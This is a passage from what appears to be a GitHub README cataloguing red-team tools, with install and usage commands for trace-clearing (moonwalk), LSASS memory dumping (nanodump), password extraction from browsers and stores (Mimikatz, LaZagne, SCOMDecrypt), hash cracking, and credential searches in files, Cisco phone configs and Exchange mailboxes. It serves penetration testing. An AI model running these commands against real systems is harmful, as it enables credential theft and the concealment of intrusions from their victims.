https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk chmod +x moonwalk moonwalk start <span class="pl-c"><span class="pl-c">#</span> Once you are finished, clear your traces </span> moonwalk finish</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png"><img src="https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/mufeedvh/moonwalk">https://github.com/mufeedvh/moonwalk</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Credential Access</h1><a id="user-content-credential-access" class="anchor" aria-label="Permalink: Credential Access" href="#credential-access"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a></h3><a id="user-content-mimikatz" class="anchor" aria-label="Permalink: 🔙Mimikatz" href="#mimikatz"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Great tool for gaining access to hashed and cleartext passwords on a victims endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.</p> <p dir="auto"><strong>Install:</strong></p> <ol dir="auto"> <li>Download the <a href="https://github.com/gentilkiwi/mimikatz/releases">mimikatz_trunk.7z</a> file.</li> <li>Once downloaded, the <code>mimikatz.exe</code> binary is in the <code>x64</code> folder.</li> </ol> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=".\mimikatz.exe privilege::debug"><pre>.<span class="pl-cce">\m</span>imikatz.exe privilege::debug</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png"><img src="https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/AlessandroZ/LaZagne">LaZagne</a></h3><a id="user-content-lazagne" class="anchor" aria-label="Permalink: 🔙LaZagne" href="#lazagne"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Nice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.</p> <p dir="auto"><strong>Install: (Binary)</strong></p> <p dir="auto">You can install the standalone binary from <a href="https://github.com/AlessandroZ/LaZagne/releases/">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Launch all modes .\laZagne.exe all # Launch only a specific module .\laZagne.exe browsers # Launch only a specific software script .\laZagne.exe browsers -firefox"><pre><span class="pl-c"><span class="pl-c">#</span> Launch all modes</span> .<span class="pl-cce">\l</span>aZagne.exe all <span class="pl-c"><span class="pl-c">#</span> Launch only a specific module</span> .<span class="pl-cce">\l</span>aZagne.exe browsers <span class="pl-c"><span class="pl-c">#</span> Launch only a specific software script</span> .<span class="pl-cce">\l</span>aZagne.exe browsers -firefox</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png"><img src="https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/hashcat/hashcat">hashcat</a></h3><a id="user-content-hashcat" class="anchor" aria-label="Permalink: 🔙hashcat" href="#hashcat"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Tool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found <a href="https://hashcat.net/wiki/doku.php?id=example_hashes" rel="nofollow">here</a>).</p> <p dir="auto"><strong>Install: Binary</strong></p> <p dir="auto">You can install the standalone binary from <a href="https://hashcat.net/hashcat/" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=".\hashcat.exe --help"><pre>.<span class="pl-cce">\h</span>ashcat.exe --help</pre></div> <p dir="auto">Nice hashcat command <a href="https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/" rel="nofollow">cheatsheet</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png"><img src="https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/openwall/john">John the Ripper</a></h3><a id="user-content-john-the-ripper" class="anchor" aria-label="Permalink: 🔙John the Ripper" href="#john-the-ripper"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Another password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt-get install john -y"><pre>sudo apt-get install john -y</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="john"><pre>john</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png"><img src="https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/nccgroup/SCOMDecrypt">SCOMDecrypt</a></h3><a id="user-content-scomdecrypt" class="anchor" aria-label="Permalink: 🔙SCOMDecrypt" href="#scomdecrypt"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.</p> <p dir="auto">NCC blog post - <a href="https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/" rel="nofollow">'SCOMplicated? – Decrypting SCOM “RunAs” credentials'</a></p> <p dir="auto"><strong>Pre-requisites:</strong></p> <p dir="auto">To run the tool you will require administrative privileges on the SCOM server. You will also need to ensure that you have read access to the following registry key:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins"><pre class="notranslate"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins </code></pre></div> <p dir="auto">You can check manually that you can see the database by gathering the connection details from the following keys:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName"><pre class="notranslate"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName </code></pre></div> <p dir="auto"><strong>Install: (PS1)</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/nccgroup/SCOMDecrypt cd .\SCOMDecrypt\SCOMDecrypt\ . .\Invoke-SCOMDecrypt.ps1"><pre class="notranslate"><code>git clone https://github.com/nccgroup/SCOMDecrypt cd .\SCOMDecrypt\SCOMDecrypt\ . .\Invoke-SCOMDecrypt.ps1 </code></pre></div> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">Using <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a> you can compile the SCOMDecrypt binary.</p> <p dir="auto">Open the SCOMDecrypt <a href="https://github.com/nccgroup/SCOMDecrypt">project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# PS1 Invoke-SCOMDecrypt # Compiled C# binary .\SCOMDecrypt.exe"><pre><span class="pl-c"><span class="pl-c">#</span> PS1</span> Invoke-SCOMDecrypt <span class="pl-c"><span class="pl-c">#</span> Compiled C# binary</span> .<span class="pl-cce">\S</span>COMDecrypt.exe</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png"><img src="https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image text used from <a href="https://github.com/nccgroup/SCOMDecrypt">https://github.com/nccgroup/SCOMDecrypt</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/helpsystems/nanodump">nanodump</a></h3><a id="user-content-nanodump" class="anchor" aria-label="Permalink: 🔙nanodump" href="#nanodump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">The LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.</p> <p dir="auto">Creating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.</p> <p dir="auto">This allows for the creation of a minidump of the LSASS process.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/helpsystems/nanodump.git"><pre>git clone https://github.com/helpsystems/nanodump.git</pre></div> <p dir="auto"><strong>Install: (Linux with MinGW)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="make -f Makefile.mingw"><pre>make -f Makefile.mingw</pre></div> <p dir="auto"><strong>Install: (Windows with MSVC)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="nmake -f Makefile.msvc"><pre>nmake -f Makefile.msvc</pre></div> <p dir="auto"><strong>Install: (CobaltStrike only)</strong></p> <p dir="auto">Import the <code>NanoDump.cna</code> script on Cobalt Strike.</p> <p dir="auto">Full installation information can be found <a href="https://github.com/helpsystems/nanodump">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run nanodump.x64.exe # Leverage the Silent Process Exit technique nanodump --silent-process-exit C:\Windows\Temp\ # Leverage the Shtinkering technique nanodump --shtinkering"><pre><span class="pl-c"><span class="pl-c">#</span> Run</span> nanodump.x64.exe <span class="pl-c"><span class="pl-c">#</span> Leverage the Silent Process Exit technique</span> nanodump --silent-process-exit C:<span class="pl-cce">\W</span>indows<span class="pl-cce">\T</span>emp\ <span class="pl-c"><span class="pl-c">#</span> Leverage the Shtinkering technique</span> nanodump --shtinkering</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/helpsystems/nanodump#1-usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg"><img src="https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg" alt="nanodump" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/helpsystems/nanodump">https://github.com/helpsystems/nanodump</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/t3l3machus/eviltree">eviltree</a></h3><a id="user-content-eviltree" class="anchor" aria-label="Permalink: 🔙eviltree" href="#eviltree"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A standalone python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:</p> <ul dir="auto"> <li>While searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage.</li> <li><code>tree</code> is an amazing tool for analyzing directory structures. It's really handy to have a standalone alternative of the command for post-exploitation enumeration as it is not pre-installed on every linux distro and is kind of limited on Windows (compared to the UNIX version).</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/t3l3machus/eviltree"><pre>git clone https://github.com/t3l3machus/eviltree</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Running a regex that essentially matches strings similar to: password = something against /var/www python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -v # Using comma separated keywords instead of regex python3 eviltree.py -r C:\Users\USERNAME -k passw,admin,account,login,user -L 3 -v"><pre><span class="pl-c"><span class="pl-c">#</span> Running a regex that essentially matches strings similar to: password = something against /var/www</span> python3 eviltree.py -r /var/www -x <span class="pl-s"><span class="pl-pds">"</span>.{0,3}passw.{0,3}[=]{1}.{0,18}<span class="pl-pds">"</span></span> -v <span class="pl-c"><span class="pl-c">#</span> Using comma separated keywords instead of regex</span> python3 eviltree.py -r C:<span class="pl-cce">\U</span>sers<span class="pl-cce">\U</span>SERNAME -k passw,admin,account,login,user -L 3 -v</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png"><img src="https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/t3l3machus/eviltree">https://github.com/t3l3machus/eviltree</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/trustedsec/SeeYouCM-Thief">SeeYouCM-Thief</a></h3><a id="user-content-seeyoucm-thief" class="anchor" aria-label="Permalink: 🔙SeeYouCM-Thief" href="#seeyoucm-thief"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials.</p> <p dir="auto">Will also optionally enumerate active directory users from the UDS API.</p> <p dir="auto"><a href="https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/" rel="nofollow">Blog - Exploiting common misconfigurations in cisco phone systems</a></p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/trustedsec/SeeYouCM-Thief python3 -m pip install -r requirements.txt"><pre>git clone https://github.com/trustedsec/SeeYouCM-Thief python3 -m pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Enumerate Active Directory users from the UDS api on the CUCM ./thief.py -H <CUCM server> --userenum # Without specifying a phone IP address the script will attempt to download every config in the listing. ./thief.py -H <Cisco CUCM Server> [--verbose] # Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet. ./thief.py --phone <Cisco IP Phoner> [--verbose] # Specify a subnet to scan with reverse lookups. ./thief.py --subnet <subnet to scan> [--verbose]"><pre><span class="pl-c"><span class="pl-c">#</span> Enumerate Active Directory users from the UDS api on the CUCM</span> ./thief.py -H <span class="pl-k"><</span>CUCM server<span class="pl-k">></span> --userenum <span class="pl-c"><span class="pl-c">#</span> Without specifying a phone IP address the script will attempt to download every config in the listing.</span> ./thief.py -H <span class="pl-k"><</span>Cisco CUCM Server<span class="pl-k">></span> [--verbose] <span class="pl-c"><span class="pl-c">#</span> Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.</span> ./thief.py --phone <span class="pl-k"><</span>Cisco IP Phoner<span class="pl-k">></span> [--verbose] <span class="pl-c"><span class="pl-c">#</span> Specify a subnet to scan with reverse lookups.</span> ./thief.py --subnet <span class="pl-k"><</span>subnet to scan<span class="pl-k">></span> [--verbose]</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png"><img src="https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/" rel="nofollow">https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/dafthack/MailSniper">MailSniper</a></h3><a id="user-content-mailsniper" class="anchor" aria-label="Permalink: 🔙MailSniper" href="#mailsniper"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.</p> <p dir="auto">MailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS and checking mailbox permissions for every Exchange user at an organization.</p> <p dir="auto">Nice blog post with more information about <a href="https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/" rel="nofollow">here</a>.</p> <p dir="auto"><a href="http://www.dafthack.com/files/MailSniper-Field-Manual.pdf" rel="nofollow">MailSniper Field Manual</a></p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/dafthack/MailSniper cd MailSniper Import-Module MailSniper.ps1"><pre class="notranslate"><code>git clone https://github.com/dafthack/MailSniper cd MailSniper Import-Module MailSniper.ps1 </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Search current users mailbox Invoke-SelfSearch -Mailbox current-user@domain.com"><pre><span class="pl-c"><span class="pl-c">#</span> Search current users mailbox</span> Invoke-SelfSearch -Mailbox current-user@domain.com</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png"><img src="https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://patrowl.io/" rel="nofollow">https://patrowl.io/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/djhohnstein/SharpChromium">SharpChromium</a></h3><a id="user-content-sharpchromium" class="anchor" aria-label="Permalink: 🔙SharpChromium" href="#sharpchromium"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 